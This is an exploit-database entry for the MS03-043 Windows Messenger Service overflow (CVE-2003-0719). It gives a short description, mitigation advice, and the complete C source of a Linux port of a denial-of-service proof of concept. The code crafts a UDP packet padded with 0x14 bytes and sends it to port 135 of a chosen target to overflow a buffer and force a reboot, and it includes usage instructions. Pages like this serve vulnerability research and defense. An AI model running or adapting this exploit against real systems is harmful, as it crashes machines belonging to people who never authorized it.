header-logo
Suggest Exploit
vendor:
Windows
by:
VeNoMouS
7.5
CVSS
HIGH
MS03-043
119
CWE
Product Name: Windows
Affected Version From: Windows 2000
Affected Version To: Windows 2000 SP4
Patch Exists: YES
Related CWE: CVE-2003-0719
CPE: o:microsoft:windows
Metasploit:
Other Scripts:
Platforms Tested: Linux
2003

Proof of Concept for Windows Messenger Service Overflow

This is a proof of concept for the Windows Messenger Service Overflow vulnerability. The vulnerability allows an attacker to send a message with a specially crafted body that can cause a buffer overflow and crash the target machine. The vulnerability is caused by the Messenger Service not properly validating the length of the message before passing it to the allocated buffer. When a character 0x14 is encountered in the message body, it is replaced by a CR+LF. The buffer allocated for this operation is twice the size of the string, but is then copied to a buffer that was only allocated 11CAh bytes, allowing for buffer overflow. This proof of concept launches the exploit against the target machine, causing it to reboot.

Mitigation:

To mitigate this vulnerability, it is recommended to disable the Messenger Service if it is not needed. Additionally, keeping the system up to date with the latest patches and security updates can help prevent exploitation.
Source

Exploit-DB raw data:

/* 
Mon Oct 20 14:26:55 NZDT 2003 
  
Re-written By VeNoMouS to be ported to linux, and tidy it up a little. 
This was only like a 5 minute port but it works and has been tested. 
venomgen-x.co.nz <mailto:venomgen-x.co.nz> 
  
greets to str0ke and defy 
  


DoS Proof of Concept for MS03-043 - exploitation shouldn't be too hard. 
Launching it one or two times against the target should make the 
machine reboot. Tested against a Win2K SP4. 
  
"The vulnerability results because the Messenger Service does not 
properly validate the length of a message before passing it to the allocated 
buffer" according to MS bulletin. Digging into it a bit more, we find that 
when 
  
a character 0x14 in encountered in the 'body' part of the message, it is 
replaced by a CR+LF. The buffer allocated for this operation is twice the 
size 
of the string, which is the way to go, but is then copied to a buffer which 
was only allocated 11CAh bytes. Thanks to that, we can bypass the length 
checks 
  
and overflow the fixed size buffer. 
  
Credits go to LSD :) 
  
*/ 
  
#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#include <unistd.h> 
#include <errno.h> 
#include <time.h> 
  
#include <sys/types.h> 
#include <sys/socket.h> 
#include <arpa/inet.h> 
  
  
  
  
  
// Packet format found thanks to a bit a sniffing 
static unsigned char packet_header[] = 
"\x04\x00\x28\x00" 
"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
"\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0" 
"\x4f\xb6\xe6\xfc" 
"\xff\xff\xff\xff" // 40 : unique id over 16 bytes ? 
"\xff\xff\xff\xff" 
"\xff\xff\xff\xff" 
"\xff\xff\xff\xff" 
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" 
"\x00\x00\xff\xff\xff\xff" 
"\xff\xff\xff\xff" // 74 : fields length 
"\x00\x00"; 
  
unsigned char field_header[] = 
"\xff\xff\xff\xff" // 0 : field length 
"\x00\x00\x00\x00" 
"\xff\xff\xff\xff"; // 8 : field length 
  


int usage(char *name) 
{ 
 printf("Proof of Concept for Windows Messenger Service Overflow..\n"); 
 printf("- Originally By Hanabishi Recca - reccamail.ru\n\n 
<mailto:reccamail.ru\n\n> "); 
 printf("- Ported to linux by VeNoMouS..\n"); 
 printf("- venomgen-x.co.nz\n\n\n <mailto:venomgen-x.co.nz\n\n\n> "); 
  
 printf("example : %s -d yourputtersux -i 10.33.10.4 -s 
n0nlameputer\n",name); 
 printf("\n-d <dest netbios name>\t-i <dest netbios ip>\n"); 
 printf("-s <src netbios name>\n"); 
 return 1; 
} 
  


int main(int argc,char *argv[]) 
{ 
        int i, packet_size, fields_size, s; 
        unsigned char packet[8192]; 
        struct sockaddr_in addr; 
  char from[57],machine[57],c; 
        char body[4096] = "*** MESSAGE ***"; 
  
  if(argc <= 2) 
  { 
  usage(argv[0]); 
  exit(0); 
  } 
  
    while ((c = getopt (argc, argv, "d:i:s:h")) != EOF) 
  switch(c) 
   { 
   case 'd': 
      strncpy(machine,optarg,sizeof(machine)); 
      printf("Machine is %s\n",machine); 
      break; 
   case 'i': 
            memset(&addr, 0,sizeof(addr)); 
            addr.sin_family = AF_INET; 
            addr.sin_addr.s_addr = inet_addr(optarg); 
            addr.sin_port = htons(135); 
      break; 
   case 's': 
            strncpy(from,optarg,sizeof(from)); 
      break; 
  
   case 'h': 
      usage(argv[0]); 
      exit(0); 
      break; 
   } 
       
        // A few conditions : 
        // 0 <= strlen(from) + strlen(machine) <= 56 
        // max fields size 3992 
  
  if(!addr.sin_addr.s_addr) { printf("Ummm MOFO we need a dest IP...\n"); 
exit(0); } 
  
        if(!strlen(machine)) { printf("Ummmm we also need the dest netbios 
name bro...\n"); exit(0); } 
  
  if(!strlen(from)) strcpy(from,"tolazytotype"); 
  
        memset(packet,0, sizeof(packet)); 
        packet_size = 0; 
  
        memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 
1); 
        packet_size += sizeof(packet_header) - 1; 
  
        i = strlen(from) + 1; 
        *(unsigned int *)(&field_header[0]) = i; 
        *(unsigned int *)(&field_header[8]) = i; 
        memcpy(&packet[packet_size], field_header, sizeof(field_header) - 
1); 
        packet_size += sizeof(field_header) - 1; 
        strcpy(&packet[packet_size], from); 
        packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 
4 
  
        i = strlen(machine) + 1; 
        *(unsigned int *)(&field_header[0]) = i; 
        *(unsigned int *)(&field_header[8]) = i; 
        memcpy(&packet[packet_size], field_header, sizeof(field_header) - 
1); 
        packet_size += sizeof(field_header) - 1; 
        strcpy(&packet[packet_size], machine); 
        packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 
4 
  
        fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n", 
3992 - packet_size + sizeof(packet_header) - sizeof(field_header)); 
        memset(body, 0x14, sizeof(body)); 
        body[3992 - packet_size + sizeof(packet_header) - 
sizeof(field_header) - 1] = '\0'; 
  
        i = strlen(body) + 1; 
        *(unsigned int *)(&field_header[0]) = i; 
        *(unsigned int *)(&field_header[8]) = i; 
        memcpy(&packet[packet_size], field_header, sizeof(field_header) - 
1); 
        packet_size += sizeof(field_header) - 1; 
        strcpy(&packet[packet_size], body); 
        packet_size += i; 
  
        fields_size = packet_size - (sizeof(packet_header) - 1); 
        *(unsigned int *)(&packet[40]) = time(NULL); 
        *(unsigned int *)(&packet[74]) = fields_size; 
  
        fprintf(stdout, "Total length of strings = %d\nPacket size = 
%d\nFields size = %d\n", strlen(from) + strlen(machine) + 
strlen(body),packet_size, fields_size); 
  


 if ((s = socket (AF_INET, SOCK_DGRAM, 0)) == -1 ) 
  { 
   perror("Error socket() - "); 
   exit(0); 
  } 
  
        if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, 
sizeof(addr)) == -1) 
  { 
   perror("Error sendto() - "); 
   exit(0); 
  } 
  


        exit(0); 
}

// milw0rm.com [2004-08-08]

Navigation

Suggest Exploit

Services By CQR